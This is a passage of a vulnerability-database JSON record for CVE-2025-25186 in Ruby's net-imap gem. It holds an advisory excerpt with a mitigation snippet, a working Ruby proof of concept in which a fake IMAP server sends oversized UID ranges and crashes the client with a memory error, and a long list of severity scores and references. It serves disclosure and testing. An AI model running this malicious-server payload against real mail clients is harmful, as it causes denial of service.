resp.respond_to?(:name) && resp.respond_to?(:data)\n    name = resp.name\n    code = resp.data.code&.name if resp.data.respond_to?(:code)\n    if Net::IMAP::VERSION > \"0.4.0\"\n      imap.responses(name) { _1.slice!(0...-limit) }\n      imap.responses(code) { _1.slice!(0...-limit) }\n    else\n      imap.responses(name).slice!(0...-limit)\n      imap.responses(code).slice!(0...-limit)\n    end\n  end\n  ```\n\n### Proof of concept\n\nSave the following to a ruby file (e.g: `poc.rb`) and make it executable:\n```ruby\n#!/usr/bin/env ruby\nrequire 'socket'\nrequire 'net/imap'\n\nif !defined?(Net::IMAP.config)\n  puts \"Net::IMAP.config is not available\"\nelsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data)\n  puts \"Net::IMAP.config.parser_use_deprecated_uidplus_data is not available\"\nelse\n  Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size\n  puts \"Updated parser_use_deprecated_uidplus_data to :up_to_max_size\"\nend\n\nsize = Integer(ENV[\"UID_SET_SIZE\"] || 2**32-1)\n\ndef server_addr\n  Addrinfo.tcp(\"localhost\", 0).ip_address\nend\n\ndef create_tcp_server\n  TCPServer.new(server_addr, 0)\nend\n\ndef start_server\n  th = Thread.new do\n    yield\n  end\n  sleep 0.1 until th.stop?\nend\n\ndef copyuid_response(tag: \"*\", size: 2**32-1, text: \"too large?\")\n  \"#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\\r\\n\"\nend\n\ndef appenduid_response(tag: \"*\", size: 2**32-1, text: \"too large?\")\n  \"#{tag} OK [APPENDUID 1 1:#{size}] #{text}\\r\\n\"\nend\n\nserver = create_tcp_server\nport = server.addr[1]\nputs \"Server started on port #{port}\"\n\n# server\nstart_server do\n  sock = server.accept\n  begin\n    sock.print \"* OK test server\\r\\n\"\n    cmd = sock.gets(\"\\r\\n\", chomp: true)\n    tag = cmd.match(/\\A(\\w+) /)[1]\n    puts \"Received: #{cmd}\"\n\n    malicious_response = appenduid_response(size:)\n    puts \"Sending: #{malicious_response.chomp}\"\n    sock.print malicious_response\n\n    malicious_response = copyuid_response(size:)\n    puts \"Sending: #{malicious_response.chomp}\"\n    sock.print malicious_response\n    sock.print \"* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\\r\\n\"\n    sock.print \"#{tag} OK CAPABILITY completed\\r\\n\"\n\n    cmd = sock.gets(\"\\r\\n\", chomp: true)\n    tag = cmd.match(/\\A(\\w+) /)[1]\n    puts \"Received: #{cmd}\"\n    sock.print \"* BYE If you made it this far, you passed the test!\\r\\n\"\n    sock.print \"#{tag} OK LOGOUT completed\\r\\n\"\n  rescue Exception => ex\n    puts \"Error in server: #{ex.message} (#{ex.class})\"\n  ensure\n    sock.close\n    server.close\n  end\nend\n\n# client\nbegin\n  puts \"Client connecting,..\"\n  imap = Net::IMAP.new(server_addr, port: port)\n  puts \"Received capabilities: #{imap.capability}\"\n  pp responses: imap.responses\n  imap.logout\nrescue Exception => ex\n  puts \"Error in client: #{ex.message} (#{ex.class})\"\n  puts ex.full_message\nensure\n  imap.disconnect if imap\nend\n```\n\nUse `ulimit` to limit the process's virtual memory.  The following example limits virtual memory to 1GB:\n```console\n$ ( ulimit -v 1000000 && exec ./poc.rb )\nServer started on port 34291\nClient connecting,..\nReceived: RUBY0001 CAPABILITY\nSending: * OK [APPENDUID 1 1:4294967295] too large?\nSending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large?\nError in server: Connection reset by peer @ io_fillbuf - fd:9  (Errno::ECONNRESET)\nError in client: failed to allocate memory (NoMemoryError)\n/gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError)\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command'\n        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'\n        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability'\n        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'\n        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'\n        from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability'\n        from /workspace/poc.rb:70:in '<main>'\n```","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-25186","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33317","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32952","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32872","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32846","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32936","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32897","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.32828","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33222","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33238","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33199","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3335","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33182","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33225","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33259","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3294","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33016","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33263","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33033","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33179","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33215","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-25186"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35"},{"reference_url":"https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3"},{"reference_url":"https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":""},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-25186","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-25186"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html"},{"reference_url":"https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791","reference_id":"1103791","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2344680","reference_id":"2344680","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2344680"},{"reference_url":"https://github.com/advisories/GHSA-7fc5-f82f-cx69","reference_id":"GHSA-7fc5-f82f-cx69","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7fc5-f82f-cx69"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10217","reference_id":"RHSA-2025:10217","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10217"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3906","reference_id":"RHSA-2025:3906","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3906"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4493","reference_id":"RHSA-2025:4493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8131","reference_id":"RHSA-2025:8131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8131"},{"reference_url":"https://usn.ubuntu.com/7418-1/","reference_id":"USN-7418-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7418-1/"}],"fixed_packages":[],"aliases":["CVE-2025-25186","GHSA-7fc5-f82f-cx69"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wyjh-cuuy-zbeb"}],"fixing_vulnerabilities":[],"risk_score":"3.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/ruby@3.3.8-10%3Farch=el10_0"}